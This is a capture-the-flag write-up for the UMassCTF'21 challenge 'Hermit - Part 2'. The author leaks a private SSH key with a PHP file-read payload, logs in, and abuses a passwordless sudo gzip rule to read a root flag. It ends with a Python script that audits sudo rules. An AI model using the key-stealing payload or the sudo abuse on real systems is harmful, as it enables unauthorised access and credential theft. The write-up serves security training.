UMassCTF'21: Hermit - Part 2

Hermit - Part 2

Category: web

307 points

Who are you? How did you get here? You better zip on out of here or else.

104.197.195.221:8087 34.121.84.161:8087

Created by Cobchise#6969

(The server is likely not broken. If you really think it’s broken, create a support ticket.)

Hint 1: Try enumeration

Hint 2: The port you are looking for has been forwarded to 8087.

Solution

It’s a continuation of Hermit - Part 1. The given IP/port addresses host SSH servers.

This challenge gave me a headache. Not because it is complicated, but because some of the CTF participants are assholes. The solution seems to be obvious, but it was not working, as the challenge was constantly being broken by people who got the flag first. Thankfully, pnc4 wanted to check it himself, found a better moment and was able to log in.

While I was messing around with Part 1, I figured out that there are SSH keys present in /home/hermit/.ssh/.

I extracted the private key with the payload below.

<?php
    // Read the hermit user's private SSH key and print it in the response
    $filestring = file_get_contents('/home/hermit/.ssh/id_ed25519');
    print $filestring;
?>

The key can be used to log in to the server as the hermit user.

Linux 162d488eac13 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 29 09:15:34 2021 from 89.65.174.13
-sh: 35: set: Illegal option -o history
$ bash
hermit@162d488eac13:~$ ls 
flag
hermit@162d488eac13:~$ cd flag
hermit@162d488eac13:~/flag$ ls
userflag.txt
hermit@162d488eac13:~/flag$ cat userflag.txt 
UMASS{a_picture_paints_a_thousand_shells}

Hey, we know that flag already. Keep looking…

hermit@162d488eac13:~/flag$ sudo -l
Matching Defaults entries for hermit on 162d488eac13:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hermit may run the following commands on 162d488eac13:
    (ALL : ALL) ALL
    (root) NOPASSWD: /bin/gzip -f /root/rootflag.txt -t
hermit@162d488eac13:~/flag$ sudo /bin/gzip -f /root/rootflag.txt -t
UMASS{a_test_of_integrity}
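
The `sudo -l` output above is where the second flag comes from: a passwordless root rule whose arguments name a file under /root. As an added example (not part of the original write-up), here is a small audit that parses that output and reports such rules; the `SENSITIVE` path list and the finding names are assumptions of this example.

```python
import re
import shlex

# `sudo -l` output copied from the session above.
SUDO_L = r"""Matching Defaults entries for hermit on 162d488eac13:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hermit may run the following commands on 162d488eac13:
    (ALL : ALL) ALL
    (root) NOPASSWD: /bin/gzip -f /root/rootflag.txt -t
"""

# "(runas) [TAG: ...] command" as printed by sudo -l.
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")
# Assumption of this example: paths that should never be an argument of a sudo rule.
SENSITIVE = ("/root/", "/etc/shadow", "/etc/sudoers")

def parse_rules(text):
    """Return the rules that follow the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
            rules.append({"runas": m["runas"].strip(), "tags": tags, "cmd": m["cmd"].strip()})
    return rules

def audit(rules):
    """Return (finding, detail) pairs for rules that deserve a review."""
    findings = []
    for r in rules:
        as_root = r["runas"].split(":")[0].strip() in ("root", "ALL")
        if r["cmd"] == "ALL":
            findings.append(("unrestricted", r["cmd"]))
        if as_root and "NOPASSWD" in r["tags"]:
            findings.append(("nopasswd-root", r["cmd"]))
            for arg in shlex.split(r["cmd"])[1:]:
                if arg.startswith(SENSITIVE):
                    findings.append(("sensitive-arg", arg))
    return findings

if __name__ == "__main__":
    for finding, detail in audit(parse_rules(SUDO_L)):
        print(f"{finding}: {detail}")
```

On a real host, feed it the output of `sudo -l -U <user>` for each account; a `sensitive-arg` finding means the rule hands a root-only file to a general-purpose tool and should be removed or replaced with a purpose-built wrapper.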

Flag

UMASS{a_test_of_integrity}

luc © 2021